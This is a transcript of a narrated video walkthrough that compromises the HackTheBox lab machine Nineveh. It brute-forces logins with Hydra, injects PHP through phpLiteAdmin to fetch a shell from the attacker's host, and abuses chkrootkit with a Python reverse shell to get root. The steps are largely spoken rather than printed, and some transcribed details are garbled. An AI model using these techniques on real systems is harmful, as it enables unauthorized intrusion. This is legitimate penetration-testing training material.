What's up, guys? Welcome back to IT Security Labs, and this is yet another HackTheBox machine that we're going to exploit today. It's called Nineveh and it's a medium, so we expect it to be a little challenging, but I'm very excited to share with you because I spent about a couple of days just working on it and it's really fun. Believe me when I say, this is so much fun. You learn a lot, and if you enjoy this content, like and subscribe. You'll be seeing more of these videos. So without wasting time, guys, this machine is called Nineveh, and if you remember from the biblical times, Nineveh was the city where Jonah was supposed to go. So it's always fun to know what the names mean, and usually they give you a clue of what the machine is all about. So we are in our Kali Linux machine, and the first thing that I like to do is ping the machine 10.10.10.43, and as you can see, I get my responses, and then from there I'm just going to run an nmap scan. It's the same scan that I run in every video, so by now we should be well versed with these scans, and this takes a little bit, so I already ran it here. Mine had these weird HTTPs that just repeated themselves. I'm not sure why, but you see that we have open port 80 and port 443 is also open. Let's stop this so we don't tax our machine. And so these are the only ports that we have right now. So usually the fewer ports, the better, because that means that we don't have a lot of places to be running around enumerating. So first things first, if it's a web server, it's on a Linux box, I would like to brute force some of these directories. So let me just go to my directory for this. So in my documents, I think I also have a document. Okay, right, using my GoBuster. So let me just say GoBuster. If I do an enter, you see my options here. So I would like to specify my directory. So I would like to say GoBuster. I would like to bust directories. Then I specify the URL by -u. So go ahead and check the man pages for GoBuster if you haven't done so. Then from there, I just have to specify the URL, the list, user list that I'm using. And in this time, I'm using the word list, dirbuster, in the medium.text, specifying time for 30 and the -k option. This is just for the HTTP. Remember, our nmap results also had HTTPS on 443. So we need to do for both to see what kind of directories we're dealing with. So let me start that. And using the same command, but for HTTPS, I'm just going to come here. Let's cd 1. Then from here, I think I can do that. And I'm going to paste the same command, but I like it to be HTTPS. I want to enumerate both of those and see what's going on. I need to say GoBuster directories, get the URLs, and there we go. So let me verify over here. I'm running HTTP, and over here is HTTPS. Anyway, let's go check out this in Firefox and see if we can see anything in there. So in Firefox, if I do a 10.10.10.43, okay, on the default page, I don't see anything. Is that 2? Let's view page source. Okay, so that's the default page for sure. Is that true for HTTPS? Most likely. no, it's not true for HTTPS. So as you can see, we're already seeing information here. What is here? Okay. Let me inspect element, nothing, and check our results from GoBuster. Okay, this one is still going. What about this one? I thought I had two. Okay. Yeah. So this is my HTTP one found a folder called department. So let's copy that and go here. Slash department. As you can see. And over here, I tried a few things. I tried to test for SQL, just like what I did in my previous video. You know, just testing to see if I get lucky with SQL injection. Oh, that didn't work. But there's something funny here going on. If you notice, if I put the username as El McConem, just a random name, I get invalid name. That's telling, right? So let's try the regular ones. Admin, which is what most people use. Invalid password. By doing this, this just told me that admin is a valid user. This is huge because once I know at least one valid user, I can brute force this page and actually hopefully get a password. So that's a vulnerability on this page. It should never tell you what a valid user is or not. So that's something that I noticed right away. So because of that, I'm going to go and brute force it. And to brute force, for me, I like to use Hydra. I think Hydra and the roq.txt gives me results. It's usually not as fast as I would like, but at least I like to use Hydra. So to use Hydra, this is what you have to use. Let me just paste it here and show you the different results. You can run man Hydra if you want, but we're running Hydra against admin, and the password list that we're using is roq.txt. It's in the sec list. You have to unzip that if it's still zipped for you. And this is the IP address of our target, and we want an HTTP post on a form, and this is the form department. And to find out what it says login.php, you can just come over here and see that. And username is goes to user, which in our case is going to be admin, and password, and it says invalid. So let's run Hydra quickly. We should be able to crack that page if Hydra is actually working properly. Okay, so it looks like we do have a password, guys, and the password is this random number here. So what I'll just do is I'll copy that, and let's go to our login page, and it's admin, and paste. So that took about 10 minutes. So you have to be aware of that. And it looks like there's funny business here. It says under construction. Okay. That's a different image than that. So earlier I downloaded this image, and if I ever see this image somewhere else, I'm going to compare the difference between the two, just in case there's some stegno or whatever going on there. That's something to keep in mind. I always want to keep an open mind here. Oh, so at home I've just saved this image. I can do an inspect element here. Nothing. And I'm just going to the notes, and as you can see, another reminder to fix the login page. What is wrong with the login page? We saw earlier that it told us whether admin was correct or not, so it makes sense that we have that there. Check the secret folder to get in. Figure it out. This is your challenge. Whatever that secret folder is, I have no idea. Improve the DB interface. So that's a clue right there that we get that we have a database. Speaking of, let's go back here quick. It looks like my results for GoBuster, I accidentally exited it out. So let's run GoBuster for HTTPS again. Not for HTTP. Let's clear that. We want for HTTPS. Yes. Okay. Let's just let that one run because we never saw the results for HTTPS, and continue to enumerate here. So we also get another user, Amrois. That's the person who wrote this note. So we copy that to our notes. Make sure that we now know that we have somebody called Amrois that we can hopefully use again in another brute force. Okay. And then there's the logout. So looking here, is view page source. We have nothing there. You want to look everywhere. You want to literally, this image, sometimes I would just download this image and save it somewhere. And if I get stuck, this is one of the images that I'll try to come and see if there's anything embedded in it, especially when you see those little photos there. Then there's a logout page. But if you do my notes here, you want to check the URL, and every time you see the equals sign, I always think of LFI, local file inclusion, or remote file inclusion. It's always an option here. So I might test to make sure that it's not part of the deal here. But let's check the other results here. So once these are done, I'll be back and we can see if we find, actually, no, never mind. Here it is. We found another one, 301/db. So let's do that. This is on the HTTPS. There was mention of a database from here, and we have a /db, so we know there's a database. This is what you will see. And what you're looking at here on the /db is this warning. We already know var, so that's interesting. I would note that. That's so random, but that's good that we have a warning. And we have a login page here. So we have a database, and there was a note here. Improve the DB interface, maybe referring to removing all this crap here. And that's okay. We have a PHP Lite admin here. So I always like to come here, exploit or something like that. And as you can see, guys, we have remote PHP code injection here. Let's see what it says. Okay, from reading this, they are assuming that I'm able to get in. I can just create a database and put my PHP script in there before getting in. So that's good. I used to work with PHP My Admin, and this looks like it, the light version of that. So what I did here is, let's just brute force our password here, because it looks like brute force works as always. And since we have a DB here, I don't think this will find anything else. Let's clear. And to brute force our PHP, we use the same Hydra command, but in this case, this is what you do. We don't have a username, so we just put the colon here, and we're using the same raw queue to text HTTP post, and it's /db index.php as you saw. Password, we just want, this is the format that you write it in, and it should say incorrect password if we put a random password here. Don't save. So this is the phrase that we get, and that's why we have it right here. So from here, let's run it. That's Hydra for us. What you want to do is copy this command and put it somewhere safe. Next time you run into a database, which for me, this is the third time I've seen this type of database, you go and you adjust this command as needed if it's something that you can brute force. So this is quite standard, and that's why I'm doing these videos, so that I can come up with notes that I can quickly go to and copy the commands, customize them to this particular machine and throw them over there, because I know that for the OSCP and even in the real world, you don't have a lot of time to be reading around. You need to have a workflow. So this is part of my workflow when it comes to a PHP, my admin, or any type of database that I run into that I need to brute force. Okay, so it looks like our Hydra did find something, guys. It's a good day to run Hydra. So the password is password 123. I could have guessed this, but thanks to Hydra, and 5 minutes later, we have a password. So just come in here and paste the password and log in. Don't save. We are in, guys, and this is gold. Being in here, and we know that we have a local file inclusion over there from our files equals. I mean, this is good. So what I can do is, now that I'm in here and I know that I have an exploit from Googling the version of the PHP, which is 1.9, this is what it says. And this is also important for OSCP, I believe, being able to understand what the exploits are saying. And you need to read this whole thing. Then you need to follow the proof of concept. It says we need to create a database, and within this database we can actually execute scripts. The default value can be my script. That's what I'm reading here, and this is a skill that I'm working on and I'm getting really good at. I've done 3 of these so far, is being able to identify that this means that I can just put my script in the default value of a database. And I have a little bit of an advantage because I know how to create a database. I know how to create tables and all that stuff. But even if you don't know, I'll show you right now. So, okay, let's go ahead and create our database. I would like to name this one Nineveh notes.php. Let's create that. And according to our vulnerability about this PHP, we also need to go and specify. Okay, so we need to insert PHP code in the text fields. Let's try that. So going back here. Oh, come on. All right. So we need to create a table. I can name it shell. It doesn't matter. Number of fields is 1. And we can go. And let's name it shell one more time. And this one should be a text. And the default value that we want is my wget command. And this is what I'm running. It's a PHP script. And I'm doing a wget. Let me show you here. Text. This is the command I'm running. I'm running in wget on this. And I should get shell.txt, and I'm outputting it to the temp folder in the shell as shell.php. You can see right here. And we can create. And according to our reverse shell here, this is created in the temp folder. Okay, now that it's created, to execute it, let's go to our link and paste this command here. This should just execute our shell script that's in the shell.php. Aim it exactly that. So soon after naming it, my shell is right here. So I can do an ID. Okay. So that doesn't help me to be www data. So I need to escalate my privileges now. Okay, the first thing I need to do is break out of this shell using this Python command, which should do it. Okay. Where am I? I'm home. Okay, that's good. Okay, the first thing that we do is our ls list all. Want to find out if there are any files that are owned by root or funny looking files. And sure enough, there's a report here. It's owned by a user, but we like this report here. So let's go ahead and find out what's going on with this report, and we like the permissions as well. So let's see. Okay, so if we do a cd report, what's in here? Report.txt. Let's find out what's in the report.txt. So we can just do a cat okay. As you can see, it looks like these just keep generating. When I started I had 1, now I have 2, so it looks like maybe this is every minute. Let me see. ls. Okay, in a minute I should have another one, so I can do a cat. Let's take this one. So this shows me that this report must be generated by a cron job, because I keep getting more. And sure enough, it looks like interesting. So we're doing a check last log here, and the fact that it's saying not infected, this sounds like a check rootkit. I had to do some research on this one. So if you just go to Google and do a check rootkit privilege escalation, that's a very common one. So what we're doing here is we're just scanning. It looks like that's an application called check rootkit. So from there, I found that we can exploit it. And this is second exploit that we're running here. And this is what they say. We can put an executable in the temp folder under the name update, and it should just execute and give us shell. So I'm going to put our reverse PHP in the temp folder and see what happens. Okay, so to do that, let's go ahead and now I can do a vi update, and in here let's insert a Python reverse shell instead. Okay, so we got bin shell, and there we go. So we can escape that, right, and quit. That's our Python reverse shell that's going to phone back home. But in fact, let's phone home on a different port. I like this to be on N288. Okay, quit. Okay, now let's get that update file to our machine wget. But before that, let's do an ls. Okay, I see a file called update. Let me remove update and ls. It's no longer there. Wget http 10.10.10.14.33/update. Okay, it failed because I did not start my HTTP server here. Let's do that one more time. Okay, now we are serving HTTP server, and we can do this again. Okay, now we have our update folder, and let's just give it some time without changing any permissions. And we're already listening here. LVNP. Let's do it one more time. And let's just listen for a couple minutes. Okay, so looks like we got shell, and I did that after updating my permissions and making my update inexecutable. So as you can see, guys, if I do here and I say ID, I'm root. So this was definitely not an easy machine. Difficult for me. I stumbled a little bit, but as you can see, guys, it's doable. It's just a matter of persistence. So if you like this video, please remember to subscribe and like. And I will see you in the next video. We are making a lot of videos, guys, and my goal is to go for the OSCP after I've done 30 computers, 30. So once I've done 30 of these tutorials, I'll be ready to sign up for the OSCP. So that's it, guys. I will see you in the next video.